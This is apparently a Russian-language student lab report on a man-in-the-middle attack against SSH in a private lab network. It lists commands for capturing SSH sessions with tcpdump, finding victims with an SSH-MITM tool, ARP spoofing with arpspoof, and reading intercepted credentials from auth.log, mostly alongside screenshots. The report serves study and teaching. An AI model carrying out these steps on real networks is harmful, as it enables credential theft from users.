# Шишкин Д.А. ББМО-01-21. Практическая работа “атака человек-посередине на SSH”. Установка SSH MITM ![](https://i.imgur.com/Zn6Vp2e.png) ## tcpdump Поиск ssh соединений при помощи tcpdump `sudo tcpdump -w ssh.cap` `tcpdump -r ssh.cap -n port 22` ![](https://i.imgur.com/KRjqmKa.jpg) Для поиска на нестандартных портах `tcpdump -r ssh.cap -n -A | grep -E '@openssh.com'` ![](https://i.imgur.com/WH0pJB6.jpg) Поиск при помощи JoesAwesomeSSHMITMVictimFinder `sudo ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 --block-size 255` ![](https://i.imgur.com/WKBInjK.png) Подключение с клиента ![](https://i.imgur.com/IciB0FM.png) JoesAwesomeSSHMITMVictimFinder находит сессию ![](https://i.imgur.com/jcIBhM9.png) ![](https://i.imgur.com/X6yA8T1.png) Запуск arp-спуфинга `arpspoof -t 192.168.100.4 192.168.100.9` ![](https://i.imgur.com/m342gpd.jpg) Сохраненный отпечаток не сопадает ![](https://i.imgur.com/17aFJe7.png) Удалим его ![](https://i.imgur.com/ZQKZUcf.png) Теперь сессия успешно установлена ![](https://i.imgur.com/9HLT4y4.png) Просмотрим перехваченные креды `tail -f /var/log/auth.log` ![](https://i.imgur.com/KNmsZpk.png)